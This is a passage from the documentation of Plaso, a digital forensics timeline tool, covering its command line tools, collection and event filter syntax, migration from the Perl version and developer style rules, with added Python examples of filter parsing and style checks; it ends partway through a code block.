Plaso (log2timeline) Release 20210606

Jul 09, 2021

CONTENTS

1 User documentation
  1.1 User's Guide
    1.1.1 How to get started
    1.1.2 Installing the packaged release
    1.1.3 Before we start
    1.1.4 The tools
  1.2 Creating a timeline
    1.2.1 Using psteal
    1.2.2 Using log2timeline and psort
  1.3 Collection Filters
    1.3.1 Using Forensic Artifacts definitions
    1.3.2 Using filter files
    1.3.3 References
  1.4 Event filters
    1.4.1 How do event filters work
    1.4.2 Example event filter expressions
    1.4.3 Value type helpers
    1.4.4 References
  1.5 Analysis Plugins
  1.6 Tips and Tricks
    1.6.1 Import the output of a third party tool into Plaso
  1.7 Switching from Log2Timeline Perl (Legacy) to Plaso
    1.7.1 Old method
    1.7.2 New method

2 Developer documentation
  2.1 Developer Guide
    2.1.1 Setting up and maintaining your development environment
    2.1.2 Getting Started
    2.1.3 Design
    2.1.4 Roadmap
    2.1.5 Contributing Code
  2.2 Style Guide
    2.2.1 Plaso specific style points
  2.3 How to write a parser
    2.3.1 Introduction
    2.3.2 Format
    2.3.3 Parsers vs. Plugins
    2.3.4 Test data
    2.3.5 Parsers, formatters, events and event data
  2.4 How to write a parser plugin
  2.5 How to write an analysis plugin
    2.5.1 Create file and class
    2.5.2 Write minimal tests
    2.5.3 Develop plugin
    2.5.4 Expand tests
    2.5.5 Register classes
    2.5.6 Code review/submit
  2.6 How to write an output module
    2.6.1 Create file and class
    2.6.2 Write minimal tests
    2.6.3 Develop plugin
    2.6.4 Expand tests
    2.6.5 Register classes
    2.6.6 Code review/submit

3 Troubleshooting
  3.1 Quick list
    3.1.1 Performance related issues
  3.2 Isolating errors
  3.3 Producing debug logs
  3.4 Import errors
  3.5 Crashes, hangs and tracebacks
    3.5.1 A worker segfault-ing
    3.5.2 A worker gives a killed status
    3.5.3 Which processes are running
    3.5.4 Analyzing crashes with single process and debug mode
    3.5.5 Analyzing crashes with gdb
  3.6 High memory usage
  3.7 MacOS specific issues
    3.7.1 How do I remove a Plaso installation
    3.7.2 PyParsing errors
    3.7.3 ImportError: cannot import name dependencies
    3.7.4 You used pip without virtualenv and have messed up your site-packages
  3.8 Ubuntu Linux specific issues
    3.8.1 Origin of an installed package
  3.9 Windows specific issues
    3.9.1 Not a valid Win32 application
    3.9.2 Unable to find an entry point in DLL
    3.9.3 setup.py and build errors

4 Supported Formats
  4.1 Storage media image file formats
  4.2 Volume system formats
  4.3 File system formats
  4.4 File formats
  4.5 Bencode file formats
  4.6 Browser cookie formats
  4.7 Compound ZIP file formats
  4.8 ESE database file formats
  4.9 OLE Compound File formats
  4.10 Property list (plist) formats
  4.11 SQLite database file formats
  4.12 Syslog file formats
  4.13 Windows Registry formats
  4.14 Hashers Supported

5 plaso package
  5.1 Subpackages
    5.1.1 plaso.analysis package
    5.1.2 plaso.analyzers package
    5.1.3 plaso.cli package
    5.1.4 plaso.containers package
    5.1.5 plaso.engine package
    5.1.6 plaso.filters package
    5.1.7 plaso.formatters package
    5.1.8 plaso.lib package
    5.1.9 plaso.multi_process package
    5.1.10 plaso.output package
    5.1.11 plaso.parsers package
    5.1.12 plaso.preprocessors package
    5.1.13 plaso.serializer package
    5.1.14 plaso.single_process package
    5.1.15 plaso.storage package
    5.1.16 plaso.unix package
    5.1.17 plaso.winnt package
  5.2 Submodules
  5.3 plaso.dependencies module
  5.4 Module contents

6 Indices and tables

Python Module Index

Index

Plaso (Plaso Langar Að Safna Öllu), or "super timeline all the things", is a Python-based engine used by several tools for the automatic creation of timelines. Plaso's default behavior is to create super timelines, but it also supports creating more targeted timelines. These timelines support digital forensic investigators and analysts in correlating the large amount of information found in logs and other files on an average computer. The source code is available from the project page.

CHAPTER ONE

USER DOCUMENTATION

1.1 User’s Guide

1.1.1 How to get started

First determine which version of Plaso is most suitable to your needs; for more information see Releases and roadmap.

1.1.2 Installing the packaged release

To get Plaso up and running quickly:
• Docker for Linux, Mac OS and Windows.
Alternative options:
• Fedora
• MacOS
• Ubuntu
If you run into problems installing, check out the installation troubleshooting guide.

1.1.3 Before we start

Please report all discovered bugs on the issue tracker. To follow announcements from the Plaso team, send in generic inquiries or discuss the tool:
• subscribe to the log2timeline-discuss mailing list.
• join the Plaso channel of the open-source-dfir Slack community; more information can be found here.

I know the good old Perl version

If you are one of those people who liked the old Perl version of log2timeline but would really like to switch and use all the nifty features of the Python version, fear not: here is a guide to help you migrate.

1.1.4 The tools

Though Plaso was initially created with the aim of replacing the Perl version of log2timeline, its focus has shifted from a stand-alone tool to a set of modules that can be used in various use cases. Fear not, Plaso is not a developers-only project; it also includes several command line tools, each with its specific purpose. Currently these are:
• image_export
• log2timeline
• pinfo
• psort
• psteal
Note that each tool can be invoked with the -h or --help command line flag to display basic usage and command line option information.

image_export

image_export is a command line tool to export file content from a storage media image or device based on various filter criteria, such as extension names, filter paths, file format signature identifiers, file creation date and time ranges, etc.

log2timeline

log2timeline is a command line tool to extract events from individual files, recursing a directory (e.g. mount point) or a storage media image or device. log2timeline creates a Plaso storage file which can be analyzed with the pinfo and psort tools. The Plaso storage file contains the extracted events and various metadata about the collection process alongside information collected from the source data. It may also contain information about tags applied to events and reports from analysis plugins.

pinfo

pinfo is a command line tool to provide information about the contents of a Plaso storage file.

psort

psort is a command line tool to post-process Plaso storage files. It allows you to filter, sort and run automatic analysis on the contents of Plaso storage files.

psteal

psteal is a command line tool that combines the functionality of log2timeline and psort.

1.2 Creating a timeline

1.2.1 Using psteal

The quickest way to generate a timeline with Plaso is using the "psteal" frontend. For example:

    psteal.py --source image.raw -o dynamic -w registrar.csv

This will produce a CSV file containing all the events from an image, with some sensible defaults.

1.2.2 Using log2timeline and psort

Alternatively you can use "log2timeline" and "psort". For example:

    log2timeline.py --storage-file timeline.plaso image.raw
    psort.py -o dynamic -w registrar.csv timeline.plaso

1.3 Collection Filters

When you know beforehand which files are relevant for your analysis and which are not, you can use collection filters to instruct Plaso to only collect events from those files. This is also referred to as targeted collection. Plaso supports the following methods of targeted collection:
• Using Forensic Artifacts definitions
• Using filter files
Note that at the moment the different collection filters cannot be used simultaneously.

1.3.1 Using Forensic Artifacts definitions

Forensic Artifacts definitions provide a more analyst-centric approach to collection filters. For example, based on the definition:

    name: WindowsEventLogSystem
    doc: System Windows Event Log.
    sources:
    - type: FILE
      attributes:
        paths: ['%%environ_systemroot%%\System32\winevt\Logs\SysEvent.evt']
        separator: '\'
    conditions: [os_major_version<6]
    labels: [Logs]
    supported_os: [Windows]
    urls: ['https://forensicswiki.xyz/wiki/index.php?title=Windows_Event_Log_(EVT)']

‘WindowsEventLogSystem’ refers to the path ‘%SystemRoot%\System32\winevt\Logs\SysEvent.evt’. To use:

    log2timeline.py --artifact-filters WindowsEventLogSystem --storage-file timeline.plaso source.raw

Note that for convenience the Forensic Artifacts definition names can also be stored in a file.

1.3.2 Using filter files

Due to limitations in the original text-based filter file format, the YAML-based filter format was introduced. We recommend using the YAML-based format. A YAML-based filter can be used to describe the path of each file or directory Plaso should include or exclude from parsing.
• Inclusion filters are applied before exclusion filters.
• Specifying the path of a directory will include or exclude its files and subdirectories.
Path filters are case sensitive when compared to a case sensitive file system and case insensitive when compared to a case insensitive file system. To use:

    log2timeline.py --file-filter windows. --storage-file timeline.plaso source.raw

Text-based filter file format

A text-based filter can be used to describe the path of each file or directory Plaso should include in parsing. Note that the text-based filter file does not support exclusion filters. If you need this functionality, use the YAML-based filter file instead. The text-based filter file itself contains one path filter per line, or a line starting with # for a comment.

    # This is comment.
    /segment1/segment2/segment3/...
    {systemroot}/segment2/segment3/...

The path segment separator is a forward slash '/'. A path segment can be defined as:
• a string representing the exact name of the directory or file;
• a regular expression representing the name of the directory or file;
• a path expansion variable, denoted by curly brackets, such as {systemroot}.
The path must be an absolute path, meaning that it should start with '/' or with a path expansion variable that Plaso was able to resolve during preprocessing. Plaso will ignore path filters it does not consider valid. For example:

    {systemroot}/System32/config/.+[.]evt
    /(Users|Documents And Settings)/.+/AppData/Roaming/Mozilla/Firefox/Profiles/.+/places.sqlite

The first line defines a path filter that uses the "systemroot" path expansion variable, which is discovered during preprocessing and denotes the Windows SystemRoot folder. It will then process the directories and files with a name that ends with ".evt". The second line defines a path filter using both regular expressions and strings to denote the location of Firefox history files.
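The rules above applied in code, as an added example that is not Plaso's own implementation: a constructed text-based filter file is parsed, {systemroot} is expanded from a constructed value, lines Plaso would consider invalid are dropped, and the surviving filters are matched against constructed paths with the case sensitivity of the file system taken into account. The assumption that a filter naming a directory also matches everything below it is taken from the YAML-based format's description.

```python
import re

# Constructed value for the {systemroot} expansion variable; Plaso resolves it during preprocessing.
PATH_VARIABLES = {'systemroot': '/Windows'}

# Constructed text-based filter file in the format described above.
FILTER_FILE = """\
# This is comment.
{systemroot}/System32/config/.+[.]evt
/(Users|Documents And Settings)/.+/AppData/Roaming/Mozilla/Firefox/Profiles/.+/places.sqlite
{unresolved}/foo/bar
relative/path/ignored
/Temp/[unclosed
"""

# Constructed paths as they might appear on an imaged file system.
SAMPLE_PATHS = [
    '/Windows/System32/config/SysEvent.evt',
    '/Windows/System32/config/SAM',
    '/Users/alice/AppData/Roaming/Mozilla/Firefox/Profiles/abc.default/places.sqlite',
    '/Documents And Settings/bob/AppData/Roaming/Mozilla/Firefox/Profiles/xyz/places.sqlite',
    '/windows/system32/config/secevent.evt',
]

def compile_filter_file(text, variables, case_sensitive=True):
    """Parse a text-based filter file into (line, [segment regexes]) pairs.

    A line is ignored, as the page says Plaso does, when it uses a path expansion
    variable that was not resolved, is not absolute, or is not a valid regular expression.
    """
    flags = 0 if case_sensitive else re.IGNORECASE
    compiled = []
    for raw_line in text.splitlines():
        line = raw_line.strip()
        if not line or line.startswith('#'):
            continue
        try:
            expanded = re.sub(r'\{(\w+)\}', lambda m: re.escape(variables[m.group(1).lower()]), line)
            if not expanded.startswith('/'):
                continue
            segments = [re.compile(segment, flags) for segment in expanded.split('/')[1:]]
        except (KeyError, re.error):
            continue
        compiled.append((line, segments))
    return compiled

def matches_path_filter(path, segments):
    """True when each filter segment fully matches the corresponding path segment.

    Assumption: a filter naming a directory also matches the files and subdirectories
    below it (as the YAML-based format specifies), so extra trailing path segments are allowed.
    """
    parts = path.split('/')[1:]
    return len(parts) >= len(segments) and all(
        regex.fullmatch(part) for regex, part in zip(segments, parts))

def files_to_collect(paths, filters):
    """Paths that at least one path filter selects for collection."""
    return [path for path in paths if any(
        matches_path_filter(path, segments) for _, segments in filters)]
```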

YAML-based filter file format

A YAML-based filter can be used to describe the path of each file or directory Plaso should include or exclude from parsing. Include filters have precedence over exclude filters. A path filter is defined as a set of attributes:
• "description": optional description of the purpose of the path filter;
• "paths": one or more paths to filter, defined as regular expressions;
• "path_separator": optional path segment separator, which is '/' by default;
• "type": required filter type, either "include" or "exclude".
For example:

    description: Windows Event Log files.
    type: include
    path_separator: '\'
    paths:
    - '%SystemRoot%\\System32\\config\\.+[.]evt'
    ---
    description: Exclude Linux binaries.
    type: exclude
    paths:
    - '/usr/bin'

Note that if you use \ as a path segment separator it must be escaped as part of the regular expression.

1.3.3 References

• Forensic artifacts
• Targeted Timeline Collection

1.4 Event filters

Event filters are used to:
• selectively export events;
• selectively analyze events;
• apply a label to events in the tagging analysis module.
Tools that have event filter support:
• psort

1.4.1 How do event filters work

An event filter is constructed in the following way:

    EXPRESSION BOOLEAN_OPERATOR EXPRESSION

Where each expression is:

    ATTRIBUTE [not] OPERATOR [not] VALUE

Each expression can also be a collection of binary expressions and operators enclosed in parentheses.

    EXPRESSION BOOLEAN_OPERATOR (EXPRESSION BINARY_OPERATOR EXPRESSION)

The following boolean operators are supported:
• and
• or
• && (and)
• || (or)
The following keywords are available:
For negative matching the keyword "not" in front of any of these keywords is also supported. That is to say, if any of these operators is preceded with the keyword "not", negative matching is performed. Note that as of 20190512 special event attributes like 'message', 'source', 'source_short', 'source_long' and 'sourcetype' are considered part of the output and are no longer expanded in the event filter.

1.4.2 Example event filter expressions

    parser is 'syslog' and body contains 'root'

This event filter applies to all events where:
• the event was produced by the parser named 'syslog' (case sensitive) and;
• the body attribute contains the substring 'root' (case insensitive).
Use log2timeline.py --info to retrieve a list of the names of all the available parsers. Or use pinfo.py timeline.plaso to see a list of all parsers that were used to produce the output in the storage file.

    parser contains 'firefox' AND pathspec.vss_store_number>0

• The parser name contains the word "firefox";
• The event was extracted from a Volume Shadow Snapshot (VSS).

1.4.3 Value type helpers

As of 20201123 value type helpers were introduced to ensure certain types are handled consistently. The following value type helpers are currently supported:
• Date and time value helper

Date and time value helper

The date and time value helper is:

    DATETIME(int|str)

It supports two different types of arguments, either:
• an integer containing a POSIX timestamp in microseconds;
• an ISO 8601 date and time string.
Note that the more common forms of ISO 8601 strings are supported, but not all. The maximum supported granularity is microseconds. For example:

    DATETIME(0)
    DATETIME("2020-12-23T12:34:56.789")
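The expression syntax of 1.4.1 and 1.4.2 together with the DATETIME helper above, as an added example that is not Plaso's own filter implementation: a small parser that evaluates event filter expressions against constructed event dictionaries. It assumes left-to-right evaluation of boolean operators, treats timezone-naive ISO 8601 strings as UTC, and supports only the operators that appear on this page (is, contains, iregexp, < and >).

```python
import re
from datetime import datetime, timezone

# Grammar assumed from the page (an added illustration, not Plaso's own filter parser):
#   '(' EXPRESSION ')' | ATTRIBUTE [not] OPERATOR [not] VALUE, joined by and/&&/or/|| left to right.
_TOKEN_RE = re.compile(
    r"('(?:[^'\\]|\\.)*'|\"(?:[^\"\\]|\\.)*\")|([()])|(&&|\|\||[<>]=?)"  # string, paren, op
    r"|(-?\d+)|([A-Za-z_][\w.]*)|(\S)")                                  # int, word, junk
_OPERATORS = {
    'is': lambda a, b: a == b,                                   # case sensitive
    'contains': lambda a, b: str(b).lower() in str(a).lower(),   # case insensitive
    'iregexp': lambda a, b: re.search(b, str(a), re.IGNORECASE) is not None,
    '>': lambda a, b: a > b, '<': lambda a, b: a < b,
}

def tokenize(text):  # split an expression into (kind, value) tokens, terminated by END
    tokens = []
    for string, paren, op, integer, word, junk in _TOKEN_RE.findall(text):
        if junk:
            raise ValueError(f'unexpected character {junk!r}')
        if string:
            tokens.append(('STR', string[1:-1]))
        elif integer:
            tokens.append(('INT', int(integer)))
        else:
            tokens.append(('PAREN', paren) if paren else ('OP', op) if op else ('WORD', word))
    return tokens + [('END', None)]

def datetime_helper(value):  # DATETIME(int|str): POSIX microseconds or ISO 8601 string
    if isinstance(value, int):
        return value
    parsed = datetime.fromisoformat(value)
    if parsed.tzinfo is None:                     # assumption: a naive string means UTC
        parsed = parsed.replace(tzinfo=timezone.utc)
    delta = parsed - datetime(1970, 1, 1, tzinfo=timezone.utc)
    return (delta.days * 86400 + delta.seconds) * 1_000_000 + delta.microseconds

class EventFilter:
    def __init__(self, expression):
        self._tokens, self._pos = tokenize(expression), 0
        self._tree = self._parse()
        self._next(('END', None))                 # nothing may follow the expression
    def _next(self, expected=None):               # consume one token, checking it if expected
        token = self._tokens[self._pos]
        if (token != expected) if expected else (token[0] == 'END'):
            raise ValueError(f'syntax error at token {self._pos}: {token[1]!r}')
        self._pos += 1
        return token
    def _keyword(self):                           # lower-cased WORD/OP at the cursor, else None
        kind, value = self._tokens[self._pos]
        return value.lower() if kind in ('WORD', 'OP') else None
    def _parse(self):
        node = self._parse_term()
        while self._keyword() in ('and', '&&', 'or', '||'):
            node = (self._next()[1].lower() in ('and', '&&'), node, self._parse_term())
        return node
    def _parse_term(self):
        kind, value = self._next()
        if (kind, value) == ('PAREN', '('):
            node = self._parse()
            self._next(('PAREN', ')'))
            return node
        if kind != 'WORD':
            raise ValueError(f'expected an attribute, got {value!r}')
        negate = self._keyword() == 'not'         # optional "not" before the operator
        self._pos += negate
        operator = str(self._next()[1]).lower()
        if operator not in _OPERATORS:
            raise ValueError(f'unsupported operator {operator!r}')
        if self._keyword() == 'not':              # optional "not" before the value; two cancel out
            negate, self._pos = not negate, self._pos + 1
        kind, expected = self._next()
        if (kind, expected) == ('WORD', 'DATETIME'):  # value type helper
            self._next(('PAREN', '('))
            expected = datetime_helper(self._next()[1])
            self._next(('PAREN', ')'))
        elif kind not in ('INT', 'STR'):
            raise ValueError(f'expected a value, got {expected!r}')
        return ('cmp', value, operator, expected, negate)
    def matches(self, event, node=None):
        node = self._tree if node is None else node
        if node[0] != 'cmp':                      # boolean node: (is_and, left, right)
            left, right = self.matches(event, node[1]), self.matches(event, node[2])
            return (left and right) if node[0] else (left or right)
        _, attribute, operator, expected, negate = node
        actual = event
        for part in attribute.split('.'):         # dotted attribute, e.g. pathspec.vss_store_number
            actual = actual.get(part) if isinstance(actual, dict) else None
        if actual is None:                        # events lacking the attribute never match
            return False
        return _OPERATORS[operator](actual, expected) != negate

SAMPLE_EVENTS = [  # constructed sample events, not real Plaso output
    {'parser': 'syslog', 'body': 'session opened for ROOT', 'timestamp': 1_000_000, 'username': 'joe'},
    {'parser': 'sqlite/firefox_history', 'timestamp': 2_000_000, 'pathspec': {'vss_store_number': 2}},
    {'parser': 'winreg', 'timestamp': 3_000_000, 'username': 'Joey'},
]

def filter_events(expression, events=SAMPLE_EVENTS):
    matches = EventFilter(expression).matches   # parse once, evaluate per event
    return [i for i, event in enumerate(events) if matches(event)]
```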

1.4.4 References

• log2timeline filtering 101

1.5 Analysis Plugins

• nsrlsvr • tagging • viper • virustotal

1.6 Tips and Tricks

This is a collection of a few tips and tricks that can be used with Plaso.

1.6.1 Import the output of a third party tool into Plaso

If you want to import the output of a third party tool into your Plaso timeline, export it to bodyfile (or mactime) format. The Plaso mactime parser can parse a bodyfile. Note that the bodyfile format has numerous limitations; see ForensicsWiki: Bodyfile. The Plaso mactime parser supports timestamps with a fraction of a second since Aug 25, 2020.

1.7 Switching from Log2Timeline Perl (Legacy) to Plaso

This page contains information for those that are used to using the 0.x version of log2timeline, also known as Log2Timeline Perl or Log2Timeline legacy. The syntax has changed somewhat from the 0.x version; the largest differences may be:
• The output of the tool is no longer controllable through the log2timeline.py command line tool (or front-end). There is only one storage mechanism and that is the Plaso storage file. To produce an output file comparable with the 0.x version you'll need to run the psort.py command line tool with the l2t_csv output module.
• The log2timeline.py command line tool can extract events directly from storage media images, such as raw or E01, removing the need to manually mount these images.
• The names of the parsers have changed. There are numerous new parsers, but note that some of the older parsers have not been ported.
• The post-processing tool is no longer called l2t_process; it is now named psort.py.
• The command line parameters and options have changed considerably. More information below.
In the information below the name Plaso is the name of the new back-end, as opposed to Log2Timeline, which is the old Perl back-end. log2timeline.py is a CLI tool (or front-end). There are other front-ends to the tool though, for example Timesketch. Let's go over the old and new method of collecting a timeline from a raw storage media image file.

1.7.1 Old method

First of all we needed to mount the image. Something like this:

    sudo mount -t ntfs-3g -o ro,nodev,noexec,show_sys_files,streams_interface=windows,loop,offset=32256 image.dd /mnt/ntfs

Then we needed to run log2timeline against the mount point. You needed to define the timezone of the suspect image, which could get overwritten if a correct value was found, and you needed to define which parsers to use. The sample run is:

    cd /mnt/ntfs
    log2timeline -r -p -z CST6CDT -f win7 . > /cases/timeline/myhost.csv 2> /cases/timeline/myhost.log

This would pick all the parsers defined in the "win7" list and run those against every file found in the mount point. A list of all available parsers and lists could be produced by running:

    log2timeline -f list

As noted earlier, the above approach would produce a large "kitchen-sink" timeline that is not sorted. To sort that one (no filtering):

    cd /cases/timeline
    l2t_process.py -b myhost.csv > myhost.sorted.csv

Now we would have a large sorted CSV file ready to analyze. Limiting the output to a specific date could be achieved using methods like:

    l2t_process.py -b myhost.csv 10-10-2012..10-11-2012

However, you could not limit the output of the timeline to a narrower timeframe than a single day; for that you needed grep (or some other tool of choice).

    l2t_process.py -b myhost.csv 10-10-2012..10-11-2012 | grep ",1[8-9]:[0-5][0-9]:[0-9][0-9],"

And filtering based on content was constrained to a few options:
• Use a keyword file that contained case-insensitive regular expressions to include or exclude events.
• Use a YARA rule that matched against the description_long field.
• Use grep/sed/awk.
The problem with most of the l2t_process filtering is that it was either done on the whole line or against the description_long field. There was no easy way to filter against a more specific attribute of the event.

1.7.2 New method

Since the new version works directly on a raw image file there is no need to mount the image first (and mounting them is actually highly discouraged); the timeline can be created in a single step:

    log2timeline.py --storage-file /cases/timeline/timeline.plaso image.dd

The tool will detect whether the input is a file, directory or a disk image/partition. If the tool requires additional information, such as when VSS stores are detected or there is more than a single partition in the volume, the tool will ask for additional details. An example of that:

    The following Volume Shadow Snapshots (VSS) were found:
    Identifier  VSS store identifier                  Creation Time
    vss1        23b509aa-3499-11e3-be88-24fd52566ede  2013-10-16T13:18:01.685825+00:00
    vss2        8dfc93b3-376f-11e3-be88-24fd52566ede  2013-10-18T00:28:29.120593+00:00
    vss3        dc8ffcf4-3a6b-11e3-be8a-24fd52566ede  2013-10-21T19:24:50.879381+00:00

    Please specify the identifier(s) of the VSS that should be processed:
    Note that a range of stores can be defined as: 3..5. Multiple stores can
    be defined as: 1,3,5 (a list of comma separated values). Ranges and lists can
    also be combined as: 1,3..5. The first store is 1. If no stores are specified
    none will be processed. You can abort with Ctrl^C.

The options can also be supplied on the command line: --vss_stores '1,2' to define the VSS stores to parse, --no-vss to skip them, or --vss_stores all to process all VSS stores. Selecting a partition works the same way and can be achieved without calculating the offset into the disk image:

    log2timeline.py --partitions 2 --storage-file /cases/timeline/timeline.plaso image.dd

First of all there is quite a difference in the number of parameters; let's go briefly over them:
• There is no -r for recursive; when the tool is run against an image or a directory, recursion is automatically assumed. Run it against a single file and recursion is not turned on.
• There is no need to supply the tool with -p (preprocessing) when run against an image; that is automatically turned on.
• The -z CST6CDT is not used here. The tool automatically picks up the timezone and uses that. However, in case the timezone is not identified the option is still available, and if not provided UTC is used as the timezone.
• You may have noticed there is no -f list parameter used. The notion of selecting filters is now removed and is done automatically. The way the tool now works is that it tries to "guess" the OS and selects the appropriate parsers based on that. The categories that are available can be found here or by issuing log2timeline.py --info. If you want to override the automatic selection of parsers you can define them using the --parsers parameter.
• You have to supply the tool with the parameter to define where to save the output (it can no longer just output to STDOUT and pipe it to a file).
The equivalent of the old tool's -f list can now be found using --info. That will print out all available parsers and plugins in the tool. One thing to take note of is the different concepts of plugins and parsers. In the old tool there was just the notion of a parser, whose purpose it was to parse a single file/artifact. However Plaso introduces both plugins and parsers, and there is a distinction between the two. The parser understands and parses file formats whereas a plugin understands data inside file formats. So in the case of the Windows Registry the parser understands the file format of the registry and parses that, but it's the purpose of a plugin to read the actual key content and produce meaningful data from it. The same goes for SQLite databases: the parser understands how to read SQLite databases while the plugins understand the data in them. An example of a SQLite plugin is the Chrome History plugin, or the Firefox History plugin. Both are SQLite databases so they use the same parser, but the data stored in them is different, thus we need a plugin for that. To see the list of presets that are available use the --info parameter. The old tool allowed you to indicate which presets you wanted using the -f parameter. In the new version this same functionality is exposed as the --parsers parameter. Example usage of this parameter is:

    log2timeline.py --parsers "win7" --storage-file /cases/timeline/timeline.plaso image.dd
    log2timeline.py --parsers "win7,\!winreg" --storage-file /cases/timeline/timeline.plaso image.dd
    log2timeline.py --parsers "winreg,winevt,winevtx" --storage-file /cases/timeline/timeline.plaso image.dd

There is another difference: the old tool used l2t_csv as the default output, which could be configured using the -o parameter of log2timeline. This output was all saved in a single file that was unsorted, which meant that a post-processing tool called l2t_process needed to be run to sort the output and remove duplicate entries before analysis started (you could however immediately start to grep the output). log2timeline.py does not allow you to control the output; there is only one available output and that is the Plaso storage file. The Plaso storage file contains additional metadata about how log2timeline.py was run, information gathered during pre-processing, warnings about data that could not be parsed and other useful information that could not be stored in the older format. The downside of the storage format is that you can no longer immediately start to grep or analyze the output of the tool; now you need to run a second tool to sort, remove duplicates and change it into a human readable format.

    psort.py -w /cases/timeline/myhost.sorted.csv /cases/timeline/timeline.plaso

There is a command line tool psteal.py which runs log2timeline.py and psort.py in a single invocation. With the new storage format and the filtering possibilities of psort, many new things are now available that were not possible in the older version. For instance, the possibility to scope the time window of the output to a few minutes:

    psort.py /cases/timeline/timeline.plaso "date > '2012-10-10 18:24:00' and date < '2012-10-10 22:25:19'"

Or to a specific dataset:

    psort.py /cases/timeline/timeline.plaso "date > '2012-10-10 12:00:00' and date < '2012-10-10 23:55:14' and message contains 'evil' and (source is 'LNK' or timestamp_desc iregexp 'st\swr' or filename contains 'mystery')"

Or to just present a small time slice based on a particular event of interest:

    psort.py --slice "2012-10-10T12:00:00" /cases/timeline/timeline.plaso

More information about event filters can be found here. The main difference between the old branch and the new one is that now filtering is a lot more granular, and also very different. It is possible to filter against every attribute that is stored inside the event. Some types of events will store certain attributes, while others will not.

    psort.py /cases/timeline/timeline.plaso "username contains 'joe'"

A filter like the one above will go through every event and only include those events that actually have the username attribute set, which may not be nearly all of them (only those events that can positively attribute an event to a specific user), and then filter those events even further by only including the events that contain the letters "joe" (case insensitive). The most common usage of the filters will most likely be constrained to the common fields, like source/source_short, date/timestamp, source_long, message, filename, timestamp_desc, parser, etc. For now, the new version does not have some of the capabilities that the older version had, that is to say:
• Yara rules to filter out content.
• Inclusion/exclusion regular expressions.
These are things that are on the roadmap and should hopefully be added before too long. Another new thing that the older version did not have is metadata stored inside the storage file. Since the older version only used l2t_csv as the output (default output, configurable) it had no means of storing metadata about the runtime of the tool nor the events that were collected. That has changed with the new version. Some of the metadata stored can be used for filtering out data (or has the potential of being used for that) or at least be printed out again, since it contains useful information about the collection.

    pinfo.py -v /cases/timeline/timeline.plaso

This tool will show the metadata that is stored inside the storage file, so you can see exactly what is stored in there. The storage may also contain additional details, such as tags for events, analysis reports and other data. Another aspect that was not part of the older version is tagging and any other sort of automatic analysis on the data set. For more information see: tagging rules.

CHAPTER TWO

DEVELOPER DOCUMENTATION

2.1 Developer Guide

• Setting up and maintaining your development environment
• Getting Started
• Design
• Roadmap
• Contributing Code

2.1.1 Setting up and maintaining your development environment

The first challenge you will encounter is setting up and maintaining your development environment. Start by setting up a development environment:
• Development environment in a VirtualEnv
• Development environment on Fedora
• Development environment on MacOS
• Development environment on Ubuntu
• Development environment on Windows

2.1.2 Getting Started

Once you've set up your development environment we recommend starting simple:
• How to write a parser
• How to write a parser plugin
• How to write an analysis plugin
• How to write an output module
• How to write a tagging rule

2.1.3 Design

Overview of the general architecture of Plaso:
• Architecture
• API documentation

2.1.4 Roadmap

A high level roadmap can be found here. Individual features are tracked as a github issue and labeled as “enhancement”. A list of features we’d already like to add can be found here.

2.1.5 Contributing Code

Want to add a parser to Plaso and you are ready to go? Start by checking here if someone is already working on it. If you don't see anything there you can just go ahead and create an issue on the github site and mark it as "enhancement". Assign the issue to yourself so that we can keep track of who is working on what. If you cannot program and still have a great idea for a feature please go ahead and create an issue and leave it unassigned; note that the priority will be whoever wants to work on it. Before you start writing code, please review the following:
• Style guide. All code submitted to the project needs to follow this style guide.
• Code review. All code that is submitted into the project is reviewed by at least one other person.
• Adding a new dependency. If your code requires adding a new dependency please check out these instructions.

Before you submit your first code review

1. Join the development mailing list: [email protected] and the Slack channel; we recommend using the same account as in step 1.
2. Install the required development tools like pylint and python-mock.
3. Make sure to run all the tests in the Plaso codebase, and that they successfully complete in your development environment.
4. Make sure your development environment is set up correctly so that you can develop and test correctly.
5. Make sure your email address and name are correctly set in git. You can use the following commands:

    git config --global user.name "Full Name"
    git config --global user.email [email protected]
    git config --global push.default matching

Use git config -l to see your current configuration.

Core features changes

Sometimes you need to make some change to the core of the Plaso codebase. In those cases we ask that contributors first create a short design proposal explaining the rationale behind the change. The design doc needs to contain:
1. A description of the problem you are facing
2. A list of the objectives of the change
3. A discussion of what's in scope and what's not
4. A description of your proposed solution
The preferred way of creating these design docs is to use Google Docs and send the link to the development mailing list so that it can be discussed further before starting to implement the code.

Tests

Tests are part of a maintainable code base. Code without sufficient tests is very likely to be broken by a large rewrite/refactor. Plaso has specific guidelines for writing tests: Style guide - tests

2.2 Style Guide

Plaso follows the log2timeline style guide.

2.2.1 Plaso specific style points

Event data attribute containers

Data types

Every event data attribute container defines a data type (DATA_TYPE). Conventions for the data type names are:

1. If the data type is operating system (or operating system convention such as POSIX) specific, start with the name of the operating system or convention. Currently supported prefixes:
• android
• chromeos
• ios
• linux
• macos
• windows
Otherwise skip the operating system prefix.
2. Next is the name of the application, sub system or data format, for example 'chrome', 'windows:registry' or 'windows:evtx'. TODO: describe which one is preferred and why.
3. What follows is application, sub system or data format specific type information, for example 'windows:evtx:record'.

Value types

Values stored in an event data attribute container must be of certain types, otherwise event filtering or output formatting can break. Supported Python types are:
• bool (also see note below)
• int
• str
A list of the previously mentioned types is also supported. Do not use dict or binary strings.

Use a bool sparsely. For now it is preferred to preserve the original type. For example if -1 represents False and 0 True, store the value as an integer not as a bool. The message formatter can represent the numeric value as a human readable string.
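A check of both conventions above (data type naming and allowed value types), as an added example that is not part of the Plaso code base: it validates a DATA_TYPE name against the prefix rule and an attribute dictionary against the allowed value types. The event data containers it runs on are constructed; restricting name segments to lower-case [a-z0-9_] and treating None as "attribute not set" are assumptions, not rules stated on this page.

```python
import re

# Operating-system prefixes the Plaso style guide lists for DATA_TYPE names.
OS_PREFIXES = frozenset(['android', 'chromeos', 'ios', 'linux', 'macos', 'windows'])
# Scalar value types the style guide allows in an event data attribute container.
ALLOWED_SCALARS = (bool, int, str)
# Assumption: segment spelling; the page only shows lower-case examples.
_SEGMENT = re.compile(r'^[a-z0-9_]+$')


def check_data_type(data_type):
  """Returns the problems found in a DATA_TYPE name (empty list if fine).

  Convention from the style guide: an OS prefix only when the type is OS
  specific, then the application, sub system or data format, then further
  type information, colon separated, e.g. 'windows:evtx:record'.
  """
  problems = []
  segments = data_type.split(':')
  if not all(_SEGMENT.match(segment) for segment in segments):
    problems.append(
        '%r: segments must be non-empty [a-z0-9_] separated by ":"' % data_type)
  # An OS name anywhere but first is a misplaced prefix.
  for segment in segments[1:]:
    if segment in OS_PREFIXES:
      problems.append(
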